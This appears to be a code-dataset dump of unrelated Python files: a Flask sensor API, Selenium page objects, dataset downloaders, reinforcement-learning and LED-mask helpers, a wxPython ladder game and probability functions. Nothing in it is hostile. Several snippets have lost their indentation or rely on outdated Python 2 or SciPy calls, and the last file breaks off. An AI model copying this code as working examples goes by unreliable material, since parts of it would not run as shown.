return jsonify({'entries': last_entries})
@app.route('/api/entries/<id>', methods=['GET'])
def get_entry(id):
return jsonify(SensorsEntry.query.get_or_404(id).export_data())
@app.route('/api/entries', methods=['POST'])
def post_entry():
entry = SensorsEntry()
entry.import_data(request.json)
authorized_serial_no = Device.authorize(entry.credentials)
if authorized_serial_no:
entry.device_serial_no = authorized_serial_no
db.session.add(entry)
db.session.commit()
notify_user_about_entry(entry)
return jsonify(entry.export_data()), 201
@app.route('/entries', methods=['GET'])
def list_entries():
last_entries = SensorsEntry.query.order_by(SensorsEntry.timestamp.desc()).limit(10)
all_entries = SensorsEntry.query.order_by(SensorsEntry.timestamp.desc())
return render_template('index.html', last_entries=last_entries, all_entries=all_entries)
@app.route('/api/notify', methods=['POST'])
def send_warning():
data = request.json
push_service = FCMNotification(api_key=os.environ['FCM_KEY'])
credentials = Credentials(serial_no=data['serial_no'], password=data['password'])
authorized_serial_no = Device.authorize(credentials)
if authorized_serial_no:
result = push_service.notify_topic_subscribers(tag=2, topic_name="warnings", color="#E64A19",
message_body=data['message_body'],
message_title="Warning!")
return jsonify(result), 200
def notify_user_about_entry(entry):
temperature_string = 'Temperature: {0} ℃'.format(round(entry.temperature, 2))
humidity_string = 'Humidity: {0}%'.format(round(entry.humidity, 1))
push_service = FCMNotification(api_key=os.environ['FCM_KEY'])
result = push_service.notify_topic_subscribers(tag=1, topic_name="warnings", color="#009688",
message_body=humidity_string,
message_title=temperature_string)
return result
def test_notification(temp, hum):
    """Manually fire a push notification for an ad-hoc temperature/humidity
    pair (debug helper; not wired to any route).

    Returns the FCM result dict for inspection.
    """
    entry = SensorsEntry()
    entry.humidity = hum
    entry.temperature = temp
    result = notify_user_about_entry(entry)
    # Parenthesized print works on both Python 2 and 3; the original bare
    # `print result` statement is a SyntaxError on Python 3.
    print(result)
    return result
# Count how many '1' and '0' characters appear in one line of input and
# print the counts (ones first, then zeroes), matching the original output.
st = input()
# str.count does a single C-level scan per character class; the original
# loop's chained comparison (`i == '0' in st`) only worked by accident of
# Python's comparison chaining and rescanned the string every iteration.
ones = st.count('1')
zeroes = st.count('0')
print(ones)
print(zeroes)
22,066 | 77e48d225de2f0fe225b61273109f3f31dcc72f4 | from .base_page import BasePage
from .locators import BasePageLocators, BasketPageLocators
class BasketPage(BasePage):
    """Page object for the basket page: assertions about the cart link and
    the presence/absence of basket items."""

    def should_be_cart_button(self):
        """The cart link must be present on the page."""
        assert self.is_element_present(*BasePageLocators.CART_LINK), "Cart button is not presented"

    def should_not_be_item_cart(self):
        """The basket must contain no items."""
        assert self.is_not_element_present(*BasketPageLocators.BASKET_ITEMS), \
            "The basket is not empty"

    def should_be_text_item_cart(self):
        # NOTE(review): despite the failure message wording, this asserts the
        # "basket is empty" text IS present -- confirm the intended contract.
        assert self.is_element_present(*BasketPageLocators.TEXT_NOT_ITEM_BASKET), \
            "Success text is presented, but should not be"
22,067 | 8471574e82e50abfda32a12871ae893eb333758d | """
A set of convenience functions to download datasets for illustrative examples
"""
# Standard library
import itertools
import os
import shutil
import tempfile
import urllib
import urllib.request

# Third-party
import numpy as np
import pandas as pd
# NOTE(review): scipy.misc.comb was removed in SciPy 1.0; the drop-in
# replacement (same signature, including repetition=) is scipy.special.comb.
from scipy.misc import comb
def fetch_tikhonov_data(dpath='/tmp/glm-tools'):
    """
    Downloads data for Tikhonov example and returns data frames

    Parameters
    ----------
    dpath: str
        specifies path to which the data files should be downloaded

    Returns
    -------
    fixations_df: DataFrame
        data frame with fixation event data
    probes_df: DataFrame
        data frame with stimulus probe event data
    spikes_df: DataFrame
        data frame with spike count data
    """
    # Start from a clean download directory so stale files are never reused.
    if os.path.exists(dpath):
        shutil.rmtree(dpath)
    os.mkdir(dpath)

    base_url = "https://raw.githubusercontent.com/glm-tools/datasets/master"

    # (relative URL, local file name, extra read_csv kwargs)
    files = [
        ("tikhonov/fixations.csv", 'fixations.csv', {}),
        ("tikhonov/probes.csv", 'probes.csv', {}),
        ("tikhonov/spiketimes.csv", 'spiketimes.csv', {'header': None}),
    ]
    frames = []
    for rel_url, local_name, kwargs in files:
        url = os.path.join(base_url, rel_url)
        fname = os.path.join(dpath, local_name)
        # Python 3: urllib.urlretrieve no longer exists; use urllib.request
        # (the rest of this module already uses urllib.request).
        urllib.request.urlretrieve(url, fname)
        frames.append(pd.read_csv(fname, **kwargs))

    fixations_df, probes_df, spikes_df = frames
    return fixations_df, probes_df, spikes_df
def fetch_community_crime_data(dpath='/tmp/glm-tools'):
    """
    Downloads data for the community crime example,
    removes missing values, extracts features, and
    returns numpy arrays

    Parameters
    ----------
    dpath: str
        specifies path to which the data files should be downloaded

    Returns
    -------
    X: numpy array
        (n_samples x n_features)
    y: numpy array
        (n_samples,)
    """
    # Start from a clean download directory so stale files are never reused.
    if os.path.exists(dpath):
        shutil.rmtree(dpath)
    os.mkdir(dpath)

    fname = os.path.join(dpath, 'communities.csv')
    base_url = ("http://archive.ics.uci.edu/ml/machine-learning-databases")
    url = os.path.join(base_url, "communities/communities.data")
    # Python 3: urllib.urlretrieve no longer exists; use urllib.request.
    urllib.request.urlretrieve(url, fname)

    # Read the file we just downloaded.  The original read a hard-coded
    # '/tmp/glm-tools/communities.csv', which broke any non-default dpath.
    df = pd.read_csv(fname, header=None)

    # Remove missing values
    df.replace('?', np.nan, inplace=True)
    df.dropna(inplace=True, axis=1)
    df.dropna(inplace=True, axis=0)
    df.reset_index(inplace=True, drop=True)

    # Extract predictors and target from data frame
    X = np.array(df[df.keys()[range(3, 102)]])
    y = np.array(df[127])
    return X, y
def fetch_group_lasso_datasets():
"""
Downloads and formats data needed for the group lasso example.
Returns:
--------
design_matrix: pandas.DataFrame
pandas dataframe with formatted data and labels
groups: list
list of group indicies, the value of the ith position in the list
is the group number for the ith regression coefficient
"""
# helper functions
def find_interaction_index(seq, subseq,
alphabet="ATGC",
all_possible_len_n_interactions=None):
n = len(subseq)
alphabet_interactions = \
[set(p) for
p in list(itertools.combinations_with_replacement(alphabet, n))]
num_interactions = len(alphabet_interactions)
if all_possible_len_n_interactions is None:
all_possible_len_n_interactions = \
[set(interaction) for
interaction in
list(itertools.combinations_with_replacement(seq, n))]
subseq = set(subseq)
group_index = num_interactions * \
all_possible_len_n_interactions.index(subseq)
value_index = alphabet_interactions.index(subseq)
final_index = group_index + value_index
return final_index
def create_group_indicies_list(seqlength=7,
alphabet="ATGC",
interactions=[1, 2, 3],
include_extra=True):
alphabet_length = len(alphabet)
index_groups = []
if include_extra:
index_groups.append(0)
group_count = 1
for inter in interactions:
n_interactions = comb(seqlength, inter)
n_alphabet_combos = comb(alphabet_length,
inter,
repetition=True)
for x1 in range(int(n_interactions)):
for x2 in range(int(n_alphabet_combos)):
index_groups.append(int(group_count))
group_count += 1
return index_groups
def create_feature_vector_for_sequence(seq,
alphabet="ATGC",
interactions=[1, 2, 3]):
feature_vector_length = \
sum([comb(len(seq), inter) *
comb(len(alphabet), inter, repetition=True)
for inter in interactions]) + 1
feature_vector = np.zeros(int(feature_vector_length))
feature_vector[0] = 1.0
for inter in interactions:
# interactions at the current level
cur_interactions = \
[set(p) for p in list(itertools.combinations(seq, inter))]
interaction_idxs = \
[find_interaction_index(
seq, cur_inter,
all_possible_len_n_interactions=cur_interactions) + 1
for cur_inter in cur_interactions]
feature_vector[interaction_idxs] = 1.0
return feature_vector
positive_url = \
"http://genes.mit.edu/burgelab/maxent/ssdata/MEMset/train5_hs"
negative_url = \
"http://genes.mit.edu/burgelab/maxent/ssdata/MEMset/train0_5_hs"
pos_file = tempfile.NamedTemporaryFile() #bufsize=0)
neg_file = tempfile.NamedTemporaryFile() #bufsize=0)
posreq = urllib.request.Request(positive_url)
with urllib.request.urlopen(posreq) as posresponse:
pos_page = posresponse.read().decode("utf-8")
negreq = urllib.request.Request(negative_url)
with urllib.request.urlopen(negreq) as negresponse:
neg_page = negresponse.read().decode("utf-8")
positive_sequences = [str(line.strip().upper()) for idx, line in
enumerate(pos_page.strip().split('\n'))
if ">" not in line and idx < 2 * 8000]
negative_sequences = [str(line.strip().upper()) for idx, line in
enumerate(neg_page.strip().split('\n'))
if ">" not in line and
idx < 2 * len(positive_sequences)]
assert len(positive_sequences) == len(negative_sequences), \
"lengths were not the same: p={pos} n={neg}" \
.format(pos=len(positive_sequences), neg=len(negative_sequences))
positive_vector_matrix = np.array([create_feature_vector_for_sequence(s)
for s in positive_sequences])
negative_vector_matrix = np.array([create_feature_vector_for_sequence(s)
for s in negative_sequences])
df = pd.DataFrame(data=np.vstack((positive_vector_matrix,
negative_vector_matrix)))
df.loc[0:positive_vector_matrix.shape[0], "Label"] = 1.0
df.loc[positive_vector_matrix.shape[0]:, "Label"] = 0.0
design_matrix = df
groups = create_group_indicies_list()
return design_matrix, groups
if __name__ == '__main__':
fetch_group_lasso_datasets() |
22,068 | c168147d1fdced211541104bd0bbb9c50897b892 | from typing import Mapping, Optional, Set, Callable
from abc import abstractmethod
from algorithms.tabular_base import TabularBase
from processes.mdp_rep_for_rl_tabular import MDPRepForRLTabular
from processes.policy import Policy
from processes.det_policy import DetPolicy
from algorithms.helper_funcs import get_vf_dict_from_qf_dict_and_policy
from algorithms.helper_funcs import get_uniform_policy
from algorithms.helper_funcs import get_det_policy_from_qf_dict
from algorithms.helper_funcs import get_epsilon_decay_func
from utils.generic_typevars import S, A
from utils.standard_typevars import VFDictType, QFDictType
class RLTabularBase(TabularBase):
    """Shared plumbing for tabular reinforcement-learning algorithms.

    Stores the environment representation plus common exploration settings,
    and derives state-value functions / greedy policies from the Q-value
    function that concrete subclasses compute via get_qv_func_dict.
    """

    def __init__(
        self,
        mdp_rep_for_rl: MDPRepForRLTabular,
        exploring_start: bool,
        softmax: bool,
        epsilon: float,
        epsilon_half_life: float,
        num_episodes: int,
        max_steps: int
    ) -> None:
        self.mdp_rep: MDPRepForRLTabular = mdp_rep_for_rl
        # Whether episodes begin from randomly chosen state-action pairs.
        self.exploring_start: bool = exploring_start
        # Softmax vs epsilon-greedy action selection during learning.
        self.softmax: bool = softmax
        # epsilon decays exponentially with episode count, halving every
        # epsilon_half_life episodes.
        self.epsilon_func: Callable[[int], float] = get_epsilon_decay_func(
            epsilon,
            epsilon_half_life
        )
        self.num_episodes: int = num_episodes
        # Cap on steps per episode (guards against non-terminating episodes).
        self.max_steps: int = max_steps

    def get_state_action_dict(self) -> Mapping[S, Set[A]]:
        """Map each state to its set of legal actions."""
        return self.mdp_rep.state_action_dict

    def get_init_policy(self) -> Policy:
        """Uniform-random policy over each state's legal actions."""
        return get_uniform_policy(self.mdp_rep.state_action_dict)

    def get_value_func_dict(self, pol: Policy) -> VFDictType:
        """State-value function V(s) implied by Q(s, a) under policy *pol*."""
        return get_vf_dict_from_qf_dict_and_policy(
            self.get_qv_func_dict(pol),
            pol
        )

    @abstractmethod
    def get_qv_func_dict(self, pol: Optional[Policy]) -> QFDictType:
        """Compute Q(s, a).  *pol* may be None (see get_optimal_det_policy);
        how None is interpreted is subclass-specific."""
        pass

    def get_act_value_func_dict(self, pol: Policy) -> QFDictType:
        """Alias for get_qv_func_dict, satisfying the TabularBase interface."""
        return self.get_qv_func_dict(pol)

    def get_optimal_det_policy(self) -> DetPolicy:
        """Greedy deterministic policy extracted from the Q-value function."""
        return get_det_policy_from_qf_dict(self.get_qv_func_dict(None))
|
22,069 | 04286c74a58b96dfd1dcc7dbe2bb4da4b121abd9 | import libadalang as lal
u = lal.AnalysisContext().get_from_file("test.adb")
assert not u.diagnostics
u_decl = u.root.find(lal.TypeDecl)
print("Declaration of U => {}".format(u_decl))
print(" get_pragma ('pack') => {}".format(u_decl.p_get_pragma('pack')))
print('')
u_decl = u.root.find(lal.DottedName).p_referenced_decl()
print("Declaration of U with rebindings of Pkg_I => {}".format(u_decl))
print(" get_pragma ('pack') => {}".format(u_decl.p_get_pragma('pack')))
print('')
print('Done')
|
22,070 | fdf5664476977b778eb72c772fd5e19afc05cf8a | import numpy as np
from config import *
def bottom_up(m, channel):
    '''
    Build an LED on/off mask for a given amplitude.

    LEDs light from the bottom of the strip upward; a larger amplitude
    lights more of the strip.

    Arguments:
        m (float): amplitude in [0, 1]
        channel (int): 1 or 2, selecting which strip's LED count to use

    Returns:
        A [LED_COUNT x 3] boolean array (one column per RGB channel),
        or None for an unknown channel.
    '''
    strip_counts = {1: LED_1_COUNT, 2: LED_2_COUNT}
    if channel in strip_counts:
        total = strip_counts[channel]
        mask = np.arange(total) < m * total
        return np.tile(mask, (3, 1)).T
def bottom_upV(m, channel):
    '''
    Creates a mask of which leds to turn on given an amplitude.
    This mask lights a strip of LEDs starting at the bottom and reaching higher
    with increasing amplitude.

    Arguments:
        m (float): The amplitude in 0 to 1
        channel (int): 1 or 2, selecting which strip's LED count to use

    Returns:
        A [LED_COUNT/3 x 3] array of zeros and ones (None for other channels)
    '''
    if channel == 1:
        num_leds_on = m * LED_1_COUNT
        # NOTE(review): arange runs over a third of the strip; if LED_1_COUNT
        # is not a multiple of 3 this passes a float to np.arange (deprecated
        # in NumPy) — confirm the configured counts are multiples of 3.
        # np.abs is a no-op here since arange output is non-negative.
        return np.tile(np.abs(np.arange(LED_1_COUNT/3)) < num_leds_on/3-0.01, (3,1)).T
    elif channel == 2:
        num_leds_on = m * LED_2_COUNT
        return np.tile(np.abs(np.arange(LED_2_COUNT/3)) < num_leds_on/3-0.01, (3,1)).T
def top_down(m, channel):
    '''
    Build an LED on/off mask for a given amplitude.

    LEDs light from the top of the strip downward; a larger amplitude
    lights more of the strip.

    Arguments:
        m (float): amplitude in [0, 1]
        channel (int): 1 or 2, selecting which strip's LED count to use

    Returns:
        A [LED_COUNT x 3] boolean array, or None for an unknown channel.
    '''
    strip_counts = {1: LED_1_COUNT, 2: LED_2_COUNT}
    if channel in strip_counts:
        total = strip_counts[channel]
        mask = total - np.arange(total) < m * total
        return np.tile(mask, (3, 1)).T
def middle_out(m, channel):
    '''
    Build an LED on/off mask for a given amplitude.

    LEDs light from the middle of the strip outward; a larger amplitude
    lights a wider band.

    Arguments:
        m (float): amplitude in [0, 1]
        channel (int): 1 or 2, selecting which strip's LED count to use

    Returns:
        A [LED_COUNT x 3] boolean array, or None for an unknown channel.
    '''
    strip_counts = {1: LED_1_COUNT, 2: LED_2_COUNT}
    if channel in strip_counts:
        total = strip_counts[channel]
        mask = np.abs(total/2.0 - np.arange(total)) < (m * total)/2.
        return np.tile(mask, (3, 1)).T
def clamp(m, channel):
    '''
    Build an LED on/off mask for a given amplitude.

    LEDs light from both ends of the strip toward the middle; a larger
    amplitude closes the "clamp" further (the complement of middle_out
    at amplitude 1 - m).

    Arguments:
        m (float): amplitude in [0, 1]
        channel (int): 1 or 2, selecting which strip's LED count to use

    Returns:
        A [LED_COUNT x 3] array of zeros and ones, or None for an
        unknown channel.
    '''
    strip_counts = {1: LED_1_COUNT, 2: LED_2_COUNT}
    if channel in strip_counts:
        total = strip_counts[channel]
        dark = (1. - m) * total
        mask = np.abs(total/2.0 - np.arange(total)) < dark/2.
        return 1 - np.tile(mask, (3, 1)).T
|
def A(a, b):
    """Count how many times b can be subtracted from a before a < b.

    For non-negative a and positive b this is the integer quotient a // b.
    Rewritten iteratively: the original recursive form raised
    RecursionError for large quotients (e.g. A(10**5, 1)).

    Arguments:
        a: the dividend
        b: the divisor (must be positive for the loop to terminate)

    Returns:
        int: the number of subtractions performed.
    """
    count = 0
    while a >= b:
        a -= b
        count += 1
    return count
# Demo: repeated-subtraction quotient of 27 by 5 (prints 5).
dividend = 27
divisor = 5
print(A(dividend, divisor))
|
22,072 | 3de4374edb8f75fa9069b0889f9e9440f32968de | from PIL import Image
from matplotlib import pyplot
import numpy as np
from scipy.sparse import lil_matrix,csr_matrix
# Apply one stage of a (sparse-matrix) Haar transform to a grayscale image
# and write the result to simout.bmp.
before = Image.open("lena64.bmp")
width,height = before.size
# Perform a 4-stage Haar transform (only one stage is applied below; see
# the commented-out change_matrix**count line)
count = 1
# Only square images are handled here; with side length N we work on an
# N*N image
N = height
before_pixels = []
for x in range(height):
    matrix = []  # NOTE(review): `matrix` is never used
    for y in range(width):
        before_pixels.append([before.getpixel((x,y))])
# Convert the source image into a matrix for the linear-algebra steps
before_matrix = np.matrix(before_pixels)
haar = lil_matrix((N*N,N*N))
# Build the Haar transform as a sparse matrix
for i in range(int((N*N)/4)):
    j = (int)(i/(N/2))
    m = i % (N/2)
    ta = j*2*N+2*m
    #print(i,j,m,ta)
    for j in (0,1,2,3):
        haar[4*i+j,ta] = 1
        haar[4*i+j,ta+1] = 1*((-1)**j)
        if(j == 2 or j ==3):
            haar[4*i+j,ta+N] = -1
        else:
            haar[4*i+j,ta+N] = 1
        if(j == 1 or j == 2):
            haar[4*i+j,ta+N+1] = -1
        else:
            haar[4*i+j,ta+N+1] = 1
# Construction finished
#print(haar)
# Express the reordering of the transformed components as a matrix
transport = lil_matrix((N*N,N*N))
for a in (0,1):
    for i in range(int(height/2)):
        for j in (0,1):
            for k in range(int(width/2)):
                #print(a,i,j,k)
                x = k + (i*height) + j*(int(height/2)) + a*(height*(int(width/2)))
                y = k * 4 + j + 2*a + i*width*2
                #print(x,y)
                transport[x,y] = 1
#print(transport)
# Convert to csr_matrix; said to improve computational efficiency
haar = haar.tocsr()
transport = transport.tocsr()
# The product of transport and haar would be the actual transform matrix
# (the transport step is currently disabled — see the commented line below)
change_matrix = haar/4
#change_matrix = (transport * haar)/4
#print(change_matrix)
# Raise to the power `count` (number of stages) — currently disabled
#change_matrix = change_matrix**count
# Matrix computation (original note: the 1/4 factor was deferred to after
# the multiply — it is now folded into change_matrix above)
after_matrix = change_matrix.dot(before_matrix)
# Not strictly necessary, but convert to an array (preferred over matrix)
after_pixels = after_matrix.getA()
print(after_pixels)
# Output the image
img2 = Image.new("L",(width,height))
for x in range(height):
    for y in range(width):
        img2.putpixel((x,y),int(after_pixels[(x*width)+y]))
img2.show()
img2.save("simout.bmp")
"""
#逆変換を行う
inv_matrix = change_matrix.I
after_inv = inv_matrix.dot(after_matrix)
#する必要はないが、arrayのほうが好きなのでarrayに変換
after_pixels = after_inv.getA()
#画像の出力
img3 = Image.new("L",(width,height))
for x in range(height):
    for y in range(width):
        img3.putpixel((x,y),int(after_pixels[(x*width)+y]))
img3.show()
"""
|
22,073 | 482a0e70c500fa1eb5b883b694c83b082483641e | import re
class HandleRe:
    """String templating helper: substitutes the {no_exist_phone} placeholder."""

    @classmethod
    def re_data(cls, re_args, data):
        """Replace every '{no_exist_phone}' occurrence in *data* with *re_args*.

        re.sub already returns *data* unchanged when the pattern is absent,
        so the original re.search pre-check (which scanned the string a
        second time) was redundant and has been removed.

        Arguments:
            re_args (str): replacement text (e.g. a phone number)
            data (str): template text possibly containing the placeholder

        Returns:
            str: *data* with all placeholders substituted.
        """
        return re.sub(r'{no_exist_phone}', re_args, data)
|
22,074 | 7d9129a6181cb4bf6b99d4ee896459a534921add | def checklist2():
value = raw_input("Did you call/use/run this function by typing its name? (y/n)")
if value == 'y':
print "Good"
else:
print "Well, get to it then!"
return
value1 = raw_input("Did you put the ( character after the name to run it? (y/n)")
if value1 == 'y':
print "Awesome"
else:
print "Get crackin'"
return
value2 = raw_input("Did you put the values you want into the parenthesis separated by commas? (y/n)")
if value2 == 'y':
print "Sweet, keep going."
else:
print "Looks, like you didn't. Go do it."
return
value3 = raw_input("Did you end the function call with a ) character? (y/n)")
if value3 == 'y':
print "Congratulations, you have successfully called a function!"
return
else:
print "You missed the last step, fix it."
return
checklist2()
|
22,075 | d50adb8694cfed2335006797a31b99ec14739303 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 SeukWon Kang (kasworld@gmail.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# generated by wxGlade 0.6.3 on Sat Dec 5 17:45:08 2009
import wx
import random
# begin wxGlade: extracode
# end wxGlade
class LadderControl(wx.Control):
    """Custom wx control that draws a 'ghost leg' (ladder lottery) board.

    Before play() is called, only black vertical rails are drawn; after
    play(), each player's colored trace is drawn through the ladder.
    State: playernum, ladderlen, steps (rung matrix), showhint,
    playercolors.
    """

    def __init__(self, *args, **kwds):
        wx.Control.__init__(self, *args, **kwds)
        self.Bind(wx.EVT_PAINT, self._OnPaint)
        self.Bind(wx.EVT_SIZE, self._OnSize)
        self.setPlayerNum(10)

    def _OnPaint(self, evt):
        """Double-buffered repaint: rails only, or colored traces + rungs."""
        dc = wx.BufferedPaintDC(self)
        dc.SetBackground(wx.Brush("White", wx.SOLID))
        dc.Clear()
        size = self.GetClientSizeTuple()
        # pixel size of one column / one ladder row
        unitx, unity = float(
            size[0]) / self.playernum, float(size[1]) / self.ladderlen
        if not self.showhint:
            dc.SetPen(wx.Pen("Black", 2))
            for x in range(self.playernum):
                dc.DrawLine(
                    unitx * x + unitx / 2, 0, unitx * x + unitx / 2, size[1])
        else:
            # First pass: draw each player's vertical segments, tracking
            # which player occupies each column as rungs swap them.
            plpos = range(self.playernum)
            for y in range(self.ladderlen + 1):
                for x in range(self.playernum):
                    pl = plpos[x]  # the player to draw in this column now
                    dc.SetPen(wx.Pen(self.playercolors[pl], 4))
                    dc.DrawLine(x * unitx + unitx / 2, y * unity - unity /
                                2, x * unitx + unitx / 2, y * unity + unity / 2)
                for x in range(self.playernum):
                    if y < self.ladderlen and x < self.playernum - 1 and self.steps[y][x]:
                        plpos[x], plpos[x + 1] = plpos[x + 1], plpos[x]
            # Second pass: draw the horizontal rungs, two thin lines in
            # the colors of the players swapped by each rung.
            plpos = range(self.playernum)
            for y in range(self.ladderlen + 1):
                for x in range(self.playernum):
                    if y < self.ladderlen and x < self.playernum - 1 and self.steps[y][x]:
                        plpos[x], plpos[x + 1] = plpos[x + 1], plpos[x]
                        dc.SetPen(wx.Pen(self.playercolors[plpos[x]], 2))
                        dc.DrawLine(x * unitx + unitx / 2, y * unity + unity / 2 -
                                    2, (x + 1) * unitx + unitx / 2, y * unity + unity / 2 - 2)
                        dc.SetPen(wx.Pen(self.playercolors[plpos[x + 1]], 2))
                        dc.DrawLine(x * unitx + unitx / 2, y * unity + unity / 2 +
                                    2, (x + 1) * unitx + unitx / 2, y * unity + unity / 2 + 2)

    def _OnSize(self, evt):
        self.Refresh(False)
        self.Update()

    def setPlayerNum(self, num):
        """Reset the board for `num` players with a fresh random ladder."""
        self.showhint = False
        self.playernum = num
        self.ladderlen = self.playernum * 4
        self.makeLadder()

    def play(self):
        """Assign random colors, trace the ladder, and show the solution.

        Returns (start, playercolors): start[i] is the player index that
        ends up at column i.
        """
        self.showhint = True
        self.playercolors = []
        for i in range(self.playernum):
            self.playercolors.append(
                (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255),))
        start = range(self.playernum)
        for b in self.steps:
            for c, pos in zip(b, range(len(b))):
                if c:
                    start[pos], start[pos + 1] = start[pos + 1], start[pos]
        # print start
        self.playercolors  # NOTE(review): bare expression, no effect
        self.Refresh(False)
        return start, self.playercolors

    def makeLadder(self):
        """Randomly place rungs; no two adjacent rungs touch the same rail."""
        self.steps = []
        for y in range(self.ladderlen):
            self.steps.append([])
            for x in range(self.playernum - 1):
                hbar = random.choice([0, 1])
                if hbar and (x >= 1 and self.steps[y][x - 1]) or (y >= 1 and self.steps[y - 1][x]):
                    hbar = 0
                self.steps[y].append(hbar)
class MyFrame(wx.Frame):
    """Main window: slider + buttons on top, player names, the ladder
    board, and the result row at the bottom.

    maxplayernum text controls are pre-created; reset_playernum() shows
    only the first playernum of them.
    """

    def __init__(self, *args, **kwds):
        kwds["style"] = wx.DEFAULT_FRAME_STYLE
        wx.Frame.__init__(self, *args, **kwds)
        self.maxplayernum = 100
        self.playernum = 10
        self.slider_1 = wx.Slider(
            self, -1, self.playernum, 2, self.maxplayernum, style=wx.SL_HORIZONTAL | wx.SL_LABELS)
        self.button_1 = wx.Button(self, -1, "Set player num")
        self.buttonPlay = wx.Button(self, -1, "Play")
        self.playername = []
        self.playresult = []
        # Pre-create the maximum number of name/result fields; visibility
        # is toggled in reset_playernum().
        for a in range(self.maxplayernum):
            self.playername.append(wx.TextCtrl(self, -1, "p%d" % a))
            self.playresult.append(wx.TextCtrl(self, -1, "r%d" % a))
        self.laddergrid = LadderControl(self, -1)
        self.laddergrid.setPlayerNum(self.playernum)
        self.__set_properties()
        self.__do_layout()
        self.reset_playernum()
        self.Bind(wx.EVT_BUTTON, self.btn_setplayernum, self.button_1)
        self.Bind(wx.EVT_BUTTON, self.btn_doPlay, self.buttonPlay)
        # begin wxGlade: MyFrame.__init__
        # end wxGlade

    def __set_properties(self):
        self.SetTitle("wxLadderGame")
        # begin wxGlade: MyFrame.__set_properties
        # end wxGlade

    def __do_layout(self):
        """Stack controls vertically: toolbar, names, board, results."""
        sizer_1 = wx.BoxSizer(wx.VERTICAL)
        sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_4.Add(self.slider_1, 3, wx.EXPAND, 0)
        sizer_4.Add(self.button_1, 1, wx.EXPAND, 0)
        sizer_4.Add(self.buttonPlay, 1, wx.EXPAND, 0)
        sizer_1.Add(sizer_4, 1, wx.EXPAND, 0)
        sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
        for a in range(self.maxplayernum):
            sizer_2.Add(self.playername[a], 1, wx.EXPAND, 0)
        sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
        sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_5.Add(self.laddergrid, 1, wx.EXPAND, 0)
        # the board row gets most of the vertical space
        sizer_1.Add(sizer_5, self.playernum * 2, wx.EXPAND, 0)
        sizer_3 = wx.BoxSizer(wx.HORIZONTAL)
        for a in range(self.maxplayernum):
            sizer_3.Add(self.playresult[a], 1, wx.EXPAND, 0)
        sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
        self.SetSizer(sizer_1)
        sizer_1.Fit(self)
        self.Layout()
        # begin wxGlade: MyFrame.__do_layout
        # end wxGlade

    def reset_playernum(self):
        """Show/reset the first playernum name/result fields, rebuild the board."""
        for a in range(self.maxplayernum):
            self.playername[a].Show(a < self.playernum)
            self.playername[a].SetBackgroundColour("White")
            self.playername[a].ChangeValue("p%d" % a)
            self.playresult[a].Show(a < self.playernum)
            self.playresult[a].SetBackgroundColour("White")
            self.playresult[a].ChangeValue("r%d" % a)
        self.laddergrid.setPlayerNum(self.playernum)
        # sizer_1.Fit(self)
        self.Layout()

    def btn_setplayernum(self, event):  # wxGlade: MyFrame.<event_handler>
        self.playernum = self.slider_1.GetValue()
        self.reset_playernum()

    def btn_doPlay(self, event):
        """Run the ladder and color-code name/result fields by outcome."""
        result, cols = self.laddergrid.play()
        for i in range(self.playernum):
            self.playername[i].SetBackgroundColour(cols[i])
            self.playresult[i].SetBackgroundColour(cols[result[i]])
            pn = self.playername[result[i]].GetValue()
            rn = self.playresult[i].GetValue()
            if not rn.startswith(pn):
                self.playresult[i].ChangeValue("%s:%s" % (pn, rn))

# end of class MyFrame
if __name__ == "__main__":
    # Stand-alone entry point: create the frame and run the wx event loop.
    # NOTE(review): wx.PySimpleApp/InitAllImageHandlers are classic-wxPython
    # (Python 2 era) APIs, deprecated in modern wxPython (Phoenix).
    app = wx.PySimpleApp(0)
    wx.InitAllImageHandlers()
    frame_1 = MyFrame(None, -1, "")
    app.SetTopWindow(frame_1)
    frame_1.Show()
    app.MainLoop()
|
22,076 | 69845527e8c7d2edca6ad26cd987a273746a4aa3 | import math
from scipy.special import comb
from decimal import *
import time
import pickle
import itertools
import subprocess
import numpy as np
from optparse import OptionParser
from z3 import *
import global_vars as glbl_vars
from Objects import *
from Graph import GenerateSetting
#############
# PROBABILITY
#############
def get_prob_true(p):
    """Draw one Bernoulli sample: True with probability p, else False."""
    sample = np.random.choice(2, 1, p=[1 - p, p])
    return sample[0] == 1
def prob_crash_parameters(e,t,p_crashes=0,k_crashes=0,precision=None,immediatefailure=None):
    """Probability that exactly k_crashes of e edges crash within t steps.

    Computes  C(e, k) * (1-p)^((e-k)*t) * b^k  where
      b = 1 - (1-p)^t               (crash anywhere in the window), or
      b = (1-p)^immediatefailure * p  (crash at a fixed step) when
    `immediatefailure` is given.

    When `precision` is not None the product is evaluated with Decimal
    at that many significant digits; the unary `+res` applies the local
    context's rounding to the result.
    """
    if precision is not None:
        a1=Decimal(comb(e,k_crashes,exact=True))
        with localcontext() as ctx:
            ctx.prec = precision # Perform a high precision calculation
            one = Decimal(1)
            e=Decimal(e)
            t=Decimal(t)
            p_crashes=Decimal(p_crashes)
            k_crashes=Decimal(k_crashes)
            a = a1*((one-p_crashes)**((e-k_crashes)*t))
            if immediatefailure is None:
                b=one-((one-p_crashes)**(t))
            else:
                b=((one-p_crashes)**(immediatefailure))*p_crashes
            res = a*(b**k_crashes)
            res = +res  # round to the context precision
            return res
    else:
        # plain float path
        a=comb(e,k_crashes,exact=True)*pow(1-p_crashes,(e-k_crashes)*t)
        if immediatefailure is None:
            b=1-pow(1-p_crashes,t)
        else:
            b=pow(1-p_crashes,immediatefailure)*p_crashes
        return a*pow(b,k_crashes)
def prob_not_AMA(e,t,p_crashes=0,k_crashes=0,k_crashes_sum=None,precision=None):
    """Weight of one specific fault sequence with k_crashes crashes.

    Computes  (1-p)^((e-k)*t) * p^k * (1-p)^k_crashes_sum  where
    k_crashes_sum is the sum of the crash times (see get_model_prob).

    When `precision` is not None the product is evaluated with Decimal
    at that many significant digits; the unary `+res` applies the local
